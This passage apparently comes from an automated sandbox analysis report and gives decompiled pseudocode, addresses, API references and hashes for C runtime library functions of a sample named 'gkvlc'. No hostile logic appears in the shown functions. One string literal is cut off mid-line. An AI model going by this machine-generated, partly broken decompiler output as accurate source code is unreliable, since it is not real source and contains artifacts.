                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_free
                                                                                            • String ID: pA
                                                                                            • API String ID: 2283115069-3402996844
                                                                                            • Opcode ID: 2b031a88baeceb1b0fd4a9695a8d6e613689f543972b8f4b1f22d623e6a9b900
                                                                                            • Instruction ID: d5bed8136480a3eb7edc0508c8e588d91e0a87aeae56a90a99c529cc5f5318e2
                                                                                            • Opcode Fuzzy Hash: 2b031a88baeceb1b0fd4a9695a8d6e613689f543972b8f4b1f22d623e6a9b900
                                                                                            • Instruction Fuzzy Hash: A2110A31204B013BC6112776EC85EAB2D6ADBC5379725863BF129B22D2ED3D8D45491C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004055F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E004055F7(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x4170d8; // 0xb
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E004096D6(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00406F85(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E004096D6(__eflags,  *0x4170d8, _t18);
							if(__eflags != 0) {
								E004052CE(_t18, "\xef\xbf\								E00406FE2(0);
								goto L13;
							} else {
								_t13 = 0;
								E004096D6(__eflags,  *0x4170d8, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E004096D6(0,  *0x4170d8, 0);
							_push(0);
							L9:
							E00406FE2();
							goto L4;
						}
					}
				} else {
					_t18 = E00409697(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x4170d8; // 0xb
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                                                                            0x00405602
                                                                                            0x00405604
                                                                                            0x00405609
                                                                                            0x0040560c
                                                                                            0x0040562a
                                                                                            0x0040562d
                                                                                            0x00405632
                                                                                            0x00405634
                                                                                            0x00000000
                                                                                            0x00405636
                                                                                            0x00405642
                                                                                            0x00405646
                                                                                            0x00405648
                                                                                            0x0040566d
                                                                                            0x0040566f
                                                                                            0x00405688
                                                                                            0x0040568f
                                                                                            0x00000000
                                                                                            0x00405671
                                                                                            0x00405671
                                                                                            0x0040567a
                                                                                            0x0040567f
                                                                                            0x00000000
                                                                                            0x0040567f
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x00405653
                                                                                            0x00405658
                                                                                            0x00405659
                                                                                            0x00405659
                                                                                            0x00000000
                                                                                            0x0040565e
                                                                                            0x00405648
                                                                                            0x0040560e
                                                                                            0x00405614
                                                                                            0x00405618
                                                                                            0x00405625
                                                                                            0x00000000
                                                                                            0x0040561a
                                                                                            0x0040561d
                                                                                            0x00405697
                                                                                            0x00405697
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x0040561d
                                                                                            0x00405618
                                                                                            0x0040569a
                                                                                            0x004056a2
                                                                                            0x004056ab

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00401043,?,?,00405154,00402D9D,00415230,00000010,00402E4E,?,00401043,00000040,?,00401043,?,00417084), ref: 004055FC
                                                                                            • _free.LIBCMT ref: 00405659
                                                                                            • _free.LIBCMT ref: 0040568F
                                                                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,00405154,00402D9D,00415230,00000010,00402E4E,?,00401043,00000040,?,00401043,?,00417084), ref: 0040569A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_free
                                                                                            • String ID: pA
                                                                                            • API String ID: 2283115069-3402996844
                                                                                            • Opcode ID: b964965a6ca63236fd170d6cbc731db45417324240e27d8a68b508a31a4e4c11
                                                                                            • Instruction ID: 2a0446cf6a8a4ae22699b4cf4f7e7a1f55b1cf798951c13076c847081ba80683
                                                                                            • Opcode Fuzzy Hash: b964965a6ca63236fd170d6cbc731db45417324240e27d8a68b508a31a4e4c11
                                                                                            • Instruction Fuzzy Hash: CA112931604B002BC6102776AC81D673A6EDBC5378B254A3BF12CB22D2ED7F8C05991C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004044A3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 25%
                                                                                            			E004044A3(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x410234(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                                                            0x004044a9
                                                                                            0x004044ad
                                                                                            0x004044b8
                                                                                            0x004044c0
                                                                                            0x004044cb
                                                                                            0x004044d1
                                                                                            0x004044d5
                                                                                            0x004044dc
                                                                                            0x004044e2
                                                                                            0x004044e2
                                                                                            0x004044e4
                                                                                            0x004044e9
                                                                                            0x00000000
                                                                                            0x004044ee
                                                                                            0x004044f5

                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00404455,?,?,0040441D,004033BF,00401056,?), ref: 004044B8
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004044CB
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00404455,?,?,0040441D,004033BF,00401056,?), ref: 004044EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 5fd43f3166b696fc09582c95a172bc3c717e91f52d9c2afda1759c700c39fe0d
                                                                                            • Instruction ID: 8fdb21c5329d3ed5fc7c2340cc8c7cfd8e4bc56f7b1f9bb43bda58990462fedf
                                                                                            • Opcode Fuzzy Hash: 5fd43f3166b696fc09582c95a172bc3c717e91f52d9c2afda1759c700c39fe0d
                                                                                            • Instruction Fuzzy Hash: 56F08230501219FBCB119B51EE09BDE7E78EB44755F1080B1E504B22A0CFB48F80DB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00408D1B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00408D1B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x4178a8; // 0x4178f8
					if(_t23 != 0) {
						E00406FE2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x4178ac; // 0x418320
					if(_t24 != 0) {
						E00406FE2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x4178b0; // 0x418320
					if(_t25 != 0) {
						E00406FE2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4178d8; // 0x4178fc
					if(_t26 != 0) {
						E00406FE2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x4178dc; // 0x418324
					if(_t27 != 0) {
						return E00406FE2(_t6);
					}
				}
				return _t6;
			}










                                                                                            0x00408d21
                                                                                            0x00408d26
                                                                                            0x00408d2a
                                                                                            0x00408d30
                                                                                            0x00408d33
                                                                                            0x00408d38
                                                                                            0x00408d3c
                                                                                            0x00408d42
                                                                                            0x00408d45
                                                                                            0x00408d4a
                                                                                            0x00408d4e
                                                                                            0x00408d54
                                                                                            0x00408d57
                                                                                            0x00408d5c
                                                                                            0x00408d60
                                                                                            0x00408d66
                                                                                            0x00408d69
                                                                                            0x00408d6e
                                                                                            0x00408d6f
                                                                                            0x00408d72
                                                                                            0x00408d78
                                                                                            0x00000000
                                                                                            0x00408d80
                                                                                            0x00408d78
                                                                                            0x00408d83

                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00408D33
                                                                                              • Part of subcall function 00406FE2: HeapFree.KERNEL32(00000000,00000000,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?), ref: 00406FF8
                                                                                              • Part of subcall function 00406FE2: GetLastError.KERNEL32(?,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?,?), ref: 0040700A
                                                                                            • _free.LIBCMT ref: 00408D45
                                                                                            • _free.LIBCMT ref: 00408D57
                                                                                            • _free.LIBCMT ref: 00408D69
                                                                                            • _free.LIBCMT ref: 00408D7B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: acb9e37c236a55730079f33877cacdd91f3230724d16df496f3d80dd495db845
                                                                                            • Instruction ID: 961e2aca5c52f886b074401f8c583a9f17e67910260358ce00ccd6931b533417
                                                                                            • Opcode Fuzzy Hash: acb9e37c236a55730079f33877cacdd91f3230724d16df496f3d80dd495db845
                                                                                            • Instruction Fuzzy Hash: 0BF0FF32508244ABC620FB59F9C6C5677EDAE10710765892FF449E76D0DB38FC90866C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004071D2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E004071D2(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00403EFE(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E0040C017(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E0040507E();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00406F85(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E0040C017(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E004077BC(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00406FE2(_t300);
														_t302 = _v12;
													}
													E00406FE2(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E0040C017(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0040507E();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x417094; // 0xa69f0419
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0040C070(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E004071B5(_t244 - _t287 + 1, _t287,  &_v676, E004076C9(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E004070E6( &(_v608.cFileName),  &_v640,  &_v609, E004076C9(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00406FE2(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00406FE2(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E0040BB20(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E0040701C);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00406FE2(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E00401C75(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00406FE2(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0040C030(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00406FE2( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00406FE2(_t283);
						goto L31;
					}
				} else {
					_t219 = E0040514F(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E0040506E();
					L31:
					return _t297;
				}
				L81:
			}

















































































































                                                                                            0x004071d7
                                                                                            0x004071da
                                                                                            0x004071dd
                                                                                            0x004071de
                                                                                            0x004071e0
                                                                                            0x004071f6
                                                                                            0x004071fa
                                                                                            0x004071fd
                                                                                            0x004071ff
                                                                                            0x00407201
                                                                                            0x00407203
                                                                                            0x00407205
                                                                                            0x00407208
                                                                                            0x0040720b
                                                                                            0x0040720e
                                                                                            0x00407210
                                                                                            0x00407273
                                                                                            0x00407275
                                                                                            0x00407278
                                                                                            0x0040727a
                                                                                            0x0040727e
                                                                                            0x00407287
                                                                                            0x00407288
                                                                                            0x0040728b
                                                                                            0x0040728d
                                                                                            0x00407290
                                                                                            0x00407294
                                                                                            0x00407294
                                                                                            0x00407296
                                                                                            0x00407298
                                                                                            0x0040729a
                                                                                            0x0040729c
                                                                                            0x0040729c
                                                                                            0x0040729e
                                                                                            0x004072a1
                                                                                            0x004072a4
                                                                                            0x004072a4
                                                                                            0x004072a6
                                                                                            0x004072a7
                                                                                            0x004072a7
                                                                                            0x004072b2
                                                                                            0x004072b4
                                                                                            0x004072b7
                                                                                            0x004072b8
                                                                                            0x004072bb
                                                                                            0x004072bb
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c5
                                                                                            0x004072c5
                                                                                            0x004072d2
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072d9
                                                                                            0x004072f1
                                                                                            0x004072f4
                                                                                            0x004072f7
                                                                                            0x004072f9
                                                                                            0x004072fc
                                                                                            0x004072fe
                                                                                            0x00407301
                                                                                            0x00407304
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x00407369
                                                                                            0x00000000
                                                                                            0x00407306
                                                                                            0x00407308
                                                                                            0x00407308
                                                                                            0x0040730a
                                                                                            0x0040730d
                                                                                            0x0040730d
                                                                                            0x0040730f
                                                                                            0x00407311
                                                                                            0x00407317
                                                                                            0x0040731a
                                                                                            0x0040731a
                                                                                            0x0040731c
                                                                                            0x0040731d
                                                                                            0x0040731d
                                                                                            0x00407324
                                                                                            0x00407327
                                                                                            0x0040732b
                                                                                            0x00407338
                                                                                            0x0040733d
                                                                                            0x00407340
                                                                                            0x00407342
                                                                                            0x004073b6
                                                                                            0x004073b7
                                                                                            0x004073b8
                                                                                            0x004073b9
                                                                                            0x004073ba
                                                                                            0x004073bb
                                                                                            0x004073c0
                                                                                            0x004073c4
                                                                                            0x004073c6
                                                                                            0x004073c7
                                                                                            0x004073ca
                                                                                            0x004073ca
                                                                                            0x004073cd
                                                                                            0x004073cd
                                                                                            0x004073cf
                                                                                            0x004073d0
                                                                                            0x004073d0
                                                                                            0x004073d4
                                                                                            0x004073d5
                                                                                            0x004073dc
                                                                                            0x004073df
                                                                                            0x004073e2
                                                                                            0x004073e4
                                                                                            0x004073ec
                                                                                            0x004073ed
                                                                                            0x004073ee
                                                                                            0x004073f1
                                                                                            0x004073fb
                                                                                            0x004073ff
                                                                                            0x00407401
                                                                                            0x00407415
                                                                                            0x00407415
                                                                                            0x00407418
                                                                                            0x00407422
                                                                                            0x00407427
                                                                                            0x0040742a
                                                                                            0x0040742c
                                                                                            0x00000000
                                                                                            0x0040742e
                                                                                            0x0040742e
                                                                                            0x00407433
                                                                                            0x0040743a
                                                                                            0x0040743d
                                                                                            0x0040743f
                                                                                            0x00407450
                                                                                            0x00407452
                                                                                            0x00407454
                                                                                            0x00407454
                                                                                            0x00407454
                                                                                            0x00407441
                                                                                            0x00407442
                                                                                            0x00407447
                                                                                            0x0040744a
                                                                                            0x00407459
                                                                                            0x0040745f
                                                                                            0x00000000
                                                                                            0x00407462
                                                                                            0x00407403
                                                                                            0x00407403
                                                                                            0x00407409
                                                                                            0x0040740e
                                                                                            0x00407411
                                                                                            0x00407413
                                                                                            0x00407465
                                                                                            0x00407467
                                                                                            0x00407468
                                                                                            0x00407469
                                                                                            0x0040746a
                                                                                            0x0040746b
                                                                                            0x0040746c
                                                                                            0x00407471
                                                                                            0x00407474
                                                                                            0x00407475
                                                                                            0x00407477
                                                                                            0x0040747d
                                                                                            0x00407484
                                                                                            0x00407487
                                                                                            0x0040748a
                                                                                            0x0040748d
                                                                                            0x0040748e
